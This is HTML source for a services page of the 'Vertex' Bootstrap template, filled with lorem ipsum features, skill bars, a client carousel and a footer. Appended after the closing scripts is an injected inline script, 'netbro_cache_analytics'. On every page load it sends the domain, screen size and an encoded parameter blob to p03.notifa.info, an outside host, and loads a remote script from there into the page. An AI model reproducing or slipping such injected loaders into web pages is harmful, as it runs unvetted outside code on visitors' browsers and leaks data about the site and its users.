                    </div>

                    <div class="col-sm-4">
                        <div class="noframe"  data-aos="fade-up" data-aos-delay="200">

                            <figure class="clearfix">
                                <img src="http://bootstraptemplates.net/vertex/img/mix/08.jpg" class="attachment-full" />
                                <figcaption class="image-caption">
                                    <h3>Team of Experts</h3>
                                    <p>
                                        Cras nibh odio, dictum ut tortor auctor, vulputate condimentum mi. Mauris non porta mi, vitae viverra magna. Phasellus eleifend interdum mattis.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More →</a>
                                </figcaption>
                            </figure>
                        </div>
                    </div>
                    <div class="col-sm-4">
                        <div class="noframe"  data-aos="fade-up" data-aos-delay="200">

                            <figure class="clearfix">
                                <img src="http://bootstraptemplates.net/vertex/img/mix/10.jpg" class="attachment-full" />
                                <figcaption class="image-caption">
                                    <h3>Next Level Design</h3>
                                    <p>
                                        Cras nibh odio, dictum ut tortor auctor, vulputate condimentum mi. Mauris non porta mi, vitae viverra magna. Phasellus eleifend interdum mattis.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More →</a>
                                </figcaption>
                            </figure>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-small"></div>
                    <div class="v-divider dotted v-bg-stylish col-sm-12"></div>
                    <div class="v-spacer col-sm-12 v-height-small"></div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="col-sm-3">
                        <h3 class="v-heading v-text-heading"><span>Our Services</span></h3>
                        <p>
                            Mauris rhoncus pretium porttitor. Cras scelerisque commodo egestas scelerisque hendrerit, alique sed lorem faucibus egestas scelerisque hendrerit.
                        </p>
                        <br />
                        <a href="page-services.html#" class="btn btn-primary" target="_self"><i class="fa fa-fire"></i>View all our services</a>
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="icon-book-6 v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Customer Support</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante ipsum primis in fauc ibus orci luctus et ultrices
                                        posuere cubilia Curae; Integer in enim dui.
                                        placerat pellentesque nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="icon-trophy v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Modern Typography</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante ipsum primis in fauc ibus
                                        posuere cubilia Curae; Integer in enim dui.
                                        placerat pellentesque nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="fa fa-tablet v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Mobile Development</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante ipsum primis in fauc ibus orci luctus et ultrices
                                        Integer in enim dui.
                                        placerat pellentesque nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="row">
                    <div class="col-sm-3">
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="icon-setting-gear v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Easy To Customize</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante ipsum primis in fauc ibus orci luctus et ultrices
                                        posuere cubilia Curae;
                                        placerat pellentesque nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="icon-screen-1 v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Responsive Design</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante fauc ibus orci luctus et ultrices
                                        posuere cubilia Curae; Integer in enim dui.
                                        placerat pellentesque nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="col-sm-3">
                        <div class="feature-box left-icon-v2 v-animation"  data-aos="fade-up" data-aos-delay="200">
                            <i class="icon-loop-2 v-icon icn-holder medium"></i>
                            <div class="feature-box-text">
                                <h3>Awesome Sliders</h3>
                                <div class="feature-box-text-inner">
                                    <p>
                                        Vestibulum ante ipsum primis in fauc ibus orci luctus et ultrices
                                        posuere cubilia in enim dui.
                                        placerat nibh ut varius.
                                    </p>
                                    <a href="page-services.html#" class="read-more">Read More</a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-big"></div>
                </div>
            </div>

            <div class="v-bg-stylish v-bg-stylish-v4">

                <div class="container">
                    <div class="row">
                        <div class="col-sm-12">
                            <h3 class="v-heading v-center-heading"><span>Process steps in our projects</span></h3>
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-sm-12">
                            <div class="v-process-steps four-columns">
                                <ul class="v-process">
                                    <li>
                                        <div class="feature-box feature-box-st">
                                            <div class="feature-box-icon small icn-holder"><i class="fa fa-lightbulb-o v-icon"></i></div>
                                            <div class="feature-box-text">
                                                <h3>Idea</h3>
                                                <div class="feature-box-line"></div>
                                                <div class="feature-box-text-inner">
                                                    Sed bibendum quam sem, sit amet interdum justo fringilla id. Praesent adipiscing ac tortor vitae sum.
                                                </div>
                                            </div>
                                        </div>
                                    </li>

                                    <li>
                                        <div class="feature-box feature-box-st">
                                            <div class="feature-box-icon small icn-holder"><i class="fa fa-laptop v-icon"></i></div>
                                            <div class="feature-box-text">
                                                <h3>Design</h3>
                                                <div class="feature-box-line"></div>
                                                <div class="feature-box-text-inner">
                                                    Sed bibendum quam sem, sit amet interdum justo fringilla id. Praesent adipiscing ac tortor vitae sum.
                                                </div>
                                            </div>
                                        </div>
                                    </li>

                                    <li>
                                        <div class="feature-box feature-box-st">
                                            <div class="feature-box-icon small icn-holder"><i class="fa fa-cogs v-icon"></i></div>
                                            <div class="feature-box-text">
                                                <h3>Development</h3>
                                                <div class="feature-box-line"></div>
                                                <div class="feature-box-text-inner">
                                                    Sed bibendum quam sem, sit amet interdum justo fringilla id. Praesent adipiscing ac tortor vitae sum.
                                                </div>
                                            </div>
                                        </div>
                                    </li>

                                    <li>
                                        <div class="feature-box feature-box-st">
                                            <div class="feature-box-icon small icn-holder"><i class="fa fa-fire v-icon"></i></div>
                                            <div class="feature-box-text">
                                                <h3>Deployment</h3>
                                                <div class="feature-box-line"></div>
                                                <div class="feature-box-text-inner">
                                                    Sed bibendum quam sem, sit amet interdum justo fringilla id. Praesent adipiscing ac tortor vitae sum.
                                                </div>
                                            </div>
                                        </div>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-big"></div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-smash-text clearfix col-sm-12 v-control-right">
                        <div class="v-smash-text-wrap clearfix">
                            <div class="v-call-text">
                                <h1>
                                    Vertex is an incredibly beautiful responsive Bootstrap
                                    <br />
                                    Template for corporate and creative professionals.
                                </h1>
                            </div>
                            <a class="btn v-btn v-btn-default v-medium-button" target="_blank" href="page-services.html#"><i class="fa fa-cloud-download"></i>PURCHASE NOW</a>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-big"></div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="col-sm-8">
                        <h3 class="v-heading"><span>Our core capabilities</span></h3>

                        <ul class="nav nav-tabs nav-tabs-default" role="tablist">
                            <li class="nav-item">
                                <a class="nav-link active" id="TabId1" data-toggle="tab" href="page-services.html#TabId10" role="tab" aria-controls="TabId10" aria-expanded="true">Awards</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link " id="TabIdx" data-toggle="tab" href="page-services.html#TabIdx1" role="tab" aria-controls="TabIdx1" aria-expanded="true">Celebrations</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link " id="TabIdz" data-toggle="tab" href="page-services.html#TabIdy" role="tab" aria-controls="TabIdy" aria-expanded="true">Events</a>
                            </li>
                        </ul>

                        <div class="tab-content">
                            <div class="tab-pane fade show active" id="TabId10" role="tabpanel" aria-labelledby="TabId1">

                                <div class="row">
                                    <div class="col-md-6">
                                        <img src="http://bootstraptemplates.net/vertex/img/masonry/07.jpg" class="w-100">
                                    </div>
                                    <div class="col-md-6">
                                        <p class="mb-0">
                                            Aliquam erat volutpat. Etiam tortor sapien, elementum quis semper eu,
                                            convallis eget justo. Nulla facilisi. Curabitur cursus vestibulum turpis
                                            eget sagittis. Phasellus tempus semper tellus, sed ullamcorper libero sodales a.
                                            Fusce vulputate varius quam. Curabitur erat orci, gravida eu tempus sed,
                                            pretium non ante. Vestibulum augue nisi, vulputate pellentesque posuere id,
                                            gravida et est. Suspendisse vestibulum scelerisque metus..
                                        </p>
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade " id="TabIdx1" role="tabpanel" aria-labelledby="TabIdx">

                                <div class="row">
                                    <div class="col-sm-6">
                                        <p class="mb-0">
                                            Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam massa quis mauris
                                            sollicitudin commodo venenatis ligula commodo. Sed blandit convallis dignissim.
                                            Pellentesque pharetra velit eu velit elementum et convallis erat vulputate. Sed in
                                            nulla ut elit mollis posuere. Praesent a felis accumsan neque interdum molestie ut id
                                            massa. In hac habitasse platea dictumst. Nulla ut lorem ante. In convallis, felis eget
                                            consequat faucibus, mi diam consequat augue, quis porta nibh leo a massa. Sed quam nunc,
                                            vulputate vel imperdiet vel, aliquet sit amet risus. Maecenas nec tempus velit.
                                            Praesent gravida mi et mauris sollicitudin ultricies. Duis molestie quam sem, ac
                                            faucibus velit. Curabitur dolor dolor, fringilla vel fringilla tempor, ultricies sed
                                            tellus. Cras aliquet, nulla a feugiat adipiscing, mi enim ornare nisl, eu pellentesque
                                            nunc diam eu purus. Aliquam a arcu ac arcu aliquam vulputate ac a diam.
                                        </p>
                                    </div>
                                    <div class="col-sm-6">
                                        <p class="mb-0">
                                            Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam massa quis mauris
                                            sollicitudin commodo venenatis ligula commodo. Sed blandit convallis dignissim.
                                            Pellentesque pharetra velit eu velit elementum et convallis erat vulputate. Sed in
                                            nulla ut elit mollis posuere. Praesent a felis accumsan neque interdum molestie ut
                                            id massa. In hac habitasse platea dictumst. Nulla ut lorem ante. In convallis, felis
                                            eget consequat faucibus, mi diam consequat augue, quis porta nibh leo a massa. Sed
                                            quam nunc, vulputate vel imperdiet vel, aliquet sit amet risus. Maecenas nec tempus
                                            velit. Praesent gravida mi et mauris sollicitudin ultricies. Duis molestie quam sem,
                                            ac faucibus velit. Curabitur dolor dolor, fringilla vel fringilla tempor, ultricies
                                            sed tellus. Cras aliquet, nulla a feugiat adipiscing, mi enim ornare nisl, eu pellentesque
                                            nunc diam eu purus. Aliquam a arcu ac arcu aliquam vulputate ac a diam.
                                        </p>
                                    </div>
                                </div>
                            </div>
                            <div class="tab-pane fade " id="TabIdy" role="tabpanel" aria-labelledby="TabIdz">

                                <div class="row">
                                    <div class="col-sm-12">
                                        <p>
                                            Aliquam erat volutpat. Etiam tortor sapien, elementum quis semper eu, convallis eget justo.
                                            Nulla facilisi. Curabitur cursus vestibulum turpis eget sagittis. Phasellus tempus semper
                                            tellus, sed ullamcorper libero sodales a. Fusce vulputate varius quam. Curabitur erat orci,
                                            gravida eu tempus sed, pretium non ante. Vestibulum augue nisi, vulputate pellentesque
                                            posuere id, gravida et est. Suspendisse vestibulum scelerisque metus, ut bibendum lorem
                                            pharetra nec. Phasellus vitae faucibus nisi. Aliquam erat volutpat. Etiam sed neque massa.
                                            Pellentesque at augue sed neque faucibus tincidunt sit amet nec nisl. Aliquam erat volutpat.
                                            Etiam tortor sapien, elementum quis semper eu, convallis eget justo. Nulla facilisi.
                                            Curabitur cursus vestibulum turpis eget sagittis.
                                        </p>
                                        <p>
                                            Lorem ipsum dolor sit amet, consectetur adipiscing elit. Etiam aliquam massa quis
                                            mauris sollicitudin commodo venenatis ligula commodo. Sed blandit convallis dignissim.
                                            Pellentesque pharetra velit eu velit elementum et convallis erat vulputate. Sed in
                                            nulla ut elit mollis posuere. Praesent a felis accumsan neque interdum molestie ut id
                                            massa. In hac habitasse platea dictumst. Nulla ut lorem ante. In convallis, felis eget
                                            consequat faucibus, mi diam consequat augue, quis porta nibh leo a massa. Sed quam nunc,
                                            vulputate vel imperdiet vel, aliquet sit amet risus. Maecenas nec tempus velit. Praesent
                                            gravida mi et mauris sollicitu.
                                        </p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>

                    <div class="col-sm-4">
                        <div class="v-wrapper clearfix">
                            <h3 class="v-heading v-text-heading"><span>Our Crazy Skills</span></h3>

                            <div class="progress-bars">
                                <div class="progress-label">
                                    <span>HTML/CSS</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="100%">
                                        <span class="progress-bar-tooltip">100%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>Design</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="85%" data-appear-animation-delay="300">
                                        <span class="progress-bar-tooltip">85%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>WordPress</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="75%" data-appear-animation-delay="600">
                                        <span class="progress-bar-tooltip">75%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>Photoshop</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="85%" data-appear-animation-delay="900">
                                        <span class="progress-bar-tooltip">85%</span>
                                    </div>
                                </div>
                                <div class="progress-label">
                                    <span>Java Script</span>
                                </div>
                                <div class="progress">
                                    <div class="progress-bar progress-bar-primary" data-appear-progress-animation="95%" data-appear-animation-delay="1200">
                                        <span class="progress-bar-tooltip">95%</span>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="container">
                <div class="row">
                    <div class="v-spacer col-sm-12 v-height-small"></div>
                </div>
            </div>

            <!--Client Carousel v2-->
            <div class="v-clients-widget-v2 v-bg-stylish v-bg-stylish-v4">
                <div class="container">
                    <div class="row">
                        <div class="col-sm-12">
                            <div class="v-clients-wrap-v2 carousel-wrap">
                                <div class="owl-carousel" data-plugin-options='{"items": 6, "singleItem": false, "autoPlay": true}'>
                                    <div class="item">
                                        <figure>
                                            <a href="http://dribbble.com/" target="_blank">
                                                <img src="img/client/01.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="https://vimeo.com/pro/" target="_blank">
                                                <img src="img/client/02.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="../jquery.com/jquery_default.html" target="_blank">
                                                <img src="img/client/03.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="http://wordpress.org/" target="_blank">
                                                <img src="img/client/04.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="http://www.envato.com/" target="_blank">
                                                <img src="img/client/05.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="../jquery.com/jquery_default.html" target="_blank">
                                                <img src="img/client/03.png" />
                                            </a>
                                        </figure>
                                    </div>
                                    <div class="item">
                                        <figure>
                                            <a href="../jquery.com/jquery_default.html" target="_blank">
                                                <img src="img/client/01.png" />
                                            </a>
                                        </figure>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <!--End Client Carousel v2-->
        </div>

        <!--Footer-Wrap-->
        <div class="footer-wrap" id="footer">
            <footer>
                <div class="container">
                    <div class="row">
                        <div class="col-md-9">

                            <div class="row">
                                <div class="col-md-3">
                                    <h4>Blog</h4>
                                    <ul class="v-list">
                                        <li><i class="fa fa-caret-right"></i><a href="blog-full-width-post.html">Blog Full Width</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="blog-standard-sidebar.html">Blog Large Image</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="blog-mini-sidebar.html">Blog Medium Image</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="blog-standard-post.html">Single Post</a></li>
                                    </ul>
                                </div>
                                <div class="col-md-3">
                                    <h4>Pages</h4>
                                    <ul class="v-list">
                                        <li><i class="fa fa-caret-right"></i><a href="page-full-width.html">Full width</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-left-sidebar.html">Left sidebar</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-right-sidebar.html">Right sidebar</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-search-result.html">Search Result</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-search-result.html">Page Help</a></li>
                                    </ul>
                                </div>
                                <div class="col-md-3">
                                    <h4>Portfolio</h4>
                                    <ul class="v-list">
                                        <li><i class="fa fa-caret-right"></i><a href="portfolio-two-gallery.html">2 Columns</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="portfolio-three-standard.html">3 Columns</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="portfolio-four-gallery.html">4 Columns</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="portfolio-single.html">Single Project</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="portfolio-single-extended.html">Single Extended</a></li>
                                    </ul>
                                </div>
                                <div class="col-md-3">
                                    <h4>Extra Pages</h4>
                                    <ul class="v-list">
                                        <li><i class="fa fa-caret-right"></i><a href="page-meet-team.html">Team</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-services.html">Services</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-careers.html">Careers</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-faq.html">FAQ</a></li>
                                        <li><i class="fa fa-caret-right"></i><a href="page-about-us.html">About Us</a></li>
                                    </ul>
                                </div>
                            </div>

                            <h4>About Vertex</h4>
                            <p>
                                Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec eu pulvinar magna.
                                Phasellus semper scelerisque purus, et semper nisl lacinia sit amet. Praesent
                                venenatis turpis vitae purus semper, eget sagittis velit venenatis. Class
                                aptent taciti sociosqu ad litora torquent per conubia nostra,
                                per inceptos himenaeos... <a href="page-about-us-2.html">Read More →</a>
                            </p>
                        </div>
                        <div class="col-md-3">
                            <div class="widget-heading">
                                <h4>Contact Us</h4>
                            </div>

                            <ul class="v-list">
                                <li class="v-lead white-color"><strong>Phone:</strong> (800) 123-4567</li>
                                <li>International: (333) 456-6670</li>
                                <li>Fax: (222) 531-8999</li>
                                <li><i class="fa fa-map-marker"></i><strong>Address:</strong> 1234 Street Name, City Name, United States</li>
                                <li><i class="fa fa-envelope"></i><strong>Email:</strong> <a href="mailto:mail@example.com">mail@example.com</a></li>
                            </ul>

                            <div class="clearfix pt-2">
                                <a href="page-services.html#" class="social-icon si-dark si-facebook" title="Facebook">
                                    <i class="si-icon-facebook"></i>
                                    <i class="si-icon-facebook"></i>
                                </a>
                                <a href="page-services.html#" class="social-icon si-dark si-twitter" title="Twitter">
                                    <i class="si-icon-twitter"></i>
                                    <i class="si-icon-twitter"></i>
                                </a>
                                <a href="page-services.html#" class="social-icon si-dark si-instagram" title="Instagram">
                                    <i class="si-icon-instagram"></i>
                                    <i class="si-icon-instagram"></i>
                                </a>
                                <a href="page-services.html#" class="social-icon si-dark si-vk" title="Vk">
                                    <i class="si-icon-vk"></i>
                                    <i class="si-icon-vk"></i>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </footer>

            <div class="copyright">
                <div class="container">
                    <p>© Copyright 2018 by Vertex. All Rights Reserved.</p>
                    <nav class="footer-menu std-menu">
                        <ul class="menu">
                            <li><a href="page-services.html#">About Us</a></li>
                            <li><a href="page-services.html#">Services</a></li>
                            <li><a href="page-services.html#">Portfolio</a></li>
                            <li><a href="page-services.html#">Blog</a></li>
                            <li><a href="page-services.html#">Contact</a></li>
                            <li><a href="page-services.html#">Buy Now</a></li>
                        </ul>
                    </nav>
                </div>
            </div>
        </div>
        <!--End Footer-Wrap-->
    </div>

    <!-- Libs -->
    <script src="js/jquery.min.js"></script>
    <script src="js/popper.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/jquery.flexslider-min.js"></script>
    <script src="js/jquery.easing.js"></script>
    <script src="js/jquery.fitvids.js"></script>
    <script src="js/jquery.carouFredSel.min.js"></script>
    <script src="js/jquery.validate.js"></script>
    <script src="js/theme-plugins.js"></script>
    <script src="js/jquery.isotope.min.js"></script>
    <script src="js/imagesloaded.js"></script>

    <script src="http://bootstraptemplates.net/vertex/js/view.min.js"></script>
    <script src="plugins/aos/aos.js"></script>
    <script src="js/theme-core.js"></script>
    <script src="js/theme.js"></script>
    <script src="js/theme.init.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH25LvpQTtnctIR2To3%2by7y0UWz%2fPHWTXikUc2KMy6oyeUuVNCorBG9HT3nzGw2sdz6rKjbSljv6ujMYkQ2nvX%2fsyv9nVzHZZBxYaUeiwsqcnwLtrBn6QrXDewkT%2fjY8BoxD%2btxiQlGcaUA%2b5l4qpdYdhgMxgyuHj073V550tK2vCa3XkcrT3leXXN6KtdvEoe3ul6aVkwrXNhbFtNtcYXDqnifXudofEGHjHY9%2bm3sA9aSLjrsTWivZ8DCKC0bklsXPBpkWIdrwvu5cT3bq%2fK4cvRP5KpNxzUY7Ge1gDH%2fe5XjhLK2ORr7wsAynkjmKWXsczj1YmLO5gqgIqsKlWU1oDQozJm9fBQDVxDeIw1hHA3rrmJsoMU6Oftud3Bza5Icpn2iJpxLQA5GhmCpYG4MxeyEcFY1nphUjbRC3YW3mEUcZ0zZ6uv4PScUijpc%2fJjMJo%2f5%2fV1B6eoWnmXHzxKlEhIY21ZadNF74A4fmdko7GbHFVPJhf7%2bUjSaKXL1Q0cYeWe3Jyb34M4%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>